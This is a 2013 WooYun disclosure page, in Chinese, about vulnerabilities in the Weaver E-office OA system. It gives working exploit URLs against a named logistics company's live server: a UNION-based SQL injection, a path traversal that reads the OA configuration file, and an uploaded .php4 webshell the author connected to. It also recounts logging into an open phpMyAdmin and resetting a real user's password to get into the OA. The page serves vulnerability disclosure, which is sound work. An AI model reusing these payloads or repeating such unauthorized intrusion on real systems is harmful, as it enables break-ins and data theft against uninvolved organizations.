当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039855

漏洞标题:泛微E-office OA管理系统# 验证其通用性:SQL注入、任意文件下载、文件上传等漏洞

相关厂商:上海泛微网络科技股份有限公司

漏洞作者: Coody

提交时间:2013-10-16 09:08

修复时间:2014-01-14 09:08

公开时间:2014-01-14 09:08

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-16: 细节已通知厂商并且等待厂商处理中
2013-10-20: 厂商已经确认,细节仅向厂商公开
2013-10-23: 细节向第三方安全合作伙伴开放
2013-12-14: 细节向核心白帽子及相关领域专家公开
2013-12-24: 细节向普通白帽子公开
2014-01-03: 细节向实习白帽子公开
2014-01-14: 细节向公众公开

简要描述:

验证篇来啦

详细说明:

之前发布的两个漏洞
Coody --- WooYun: 泛微E-office OA管理系统存在任意文件下载及文件上传导致任意代码执行(已getshell)
applychen ---- WooYun: 泛微E-office OA管理系统存在SQL注射漏洞可查库
cncert国家互联网应急中心 的回应是:对于通用性还需要进一步确认
今天这篇文章证明一下其通用性(存在SQL注入、任意文件下载、文件上传导致任意代码执行)。


这里需要说明一下:
找到的该案例是通过百度搜索 【泛微oa系统】搜索出来的

QQ图片20131016003212.jpg


地址是 http://www.sjd-logistics.com:8000/ OA地址

QQ图片20131016002951.jpg


主站是 http://www.sjd-logistics.com 上海景鸿国际物流股份有限公司

QQ图片20131016002854.jpg


访问OA正常,在地址根目录下发现phpmyadmin,无需认证直接登录

QQ图片20131016002758.jpg


对于本案中躺枪的 【上海景鸿国际物流股份有限公司】望 @cncert国家互联网应急中心 也通知一声吧。
因为数据库可以直接访问,但是用户密码破解不出来,我就从user表中选了一个 【USER_ID为chenglin】的用户,清空其密码直接登录到OA系统中。但测试结束后已经恢复其原有密码。

漏洞证明:

这个部分来证明确实存在:SQL注入,任意文件下载,文件上传导致代码执行等漏洞


0x01:存在SQL注入
http://www.sjd-logistics.com:8000/general/news/show/read_news.php?NEWS_ID=214 and 1=2 union select 1,user(),database(),4,5,6

QQ图片20131016004000.jpg


0x02:任意文件下载
http://www.sjd-logistics.com:8000/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843

QQ图片20131016004327.jpg


zend解密后

QQ图片20131016005309.jpg


0x03:文件上传导致任意代码执行(上传.php4格式)
http://www.sjd-logistics.com:8000/attachment/478596600/conf1g.php4

QQ图片20131016004709.jpg


最后发一张菜刀连接的图片吧

QQ图片20131016004851.jpg

修复方案:

版权声明:转载请注明来源 Coody@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-10-20 19:00

厂商回复:

最新状态:

暂无